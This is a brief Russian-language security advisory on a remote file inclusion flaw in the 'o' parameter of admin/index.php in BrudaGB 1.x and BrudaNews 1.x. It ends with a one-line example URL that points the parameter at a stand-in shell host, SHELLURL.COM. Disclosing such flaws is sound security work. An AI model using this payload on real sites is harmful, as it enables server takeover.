Программа: BrudaGB 1.x, BrudaNews 1.x
Обнаруженная уязвимость может быть использована для подключения произвольных файлов. Уязвимость существует из-за того, что данные, передаваемые через параметр "o" не правильно обрабатываются в admin/index.php.
Пример:
http://sitename.com/[Script Path]/admin/index.php? o=http://SHELLURL.COM
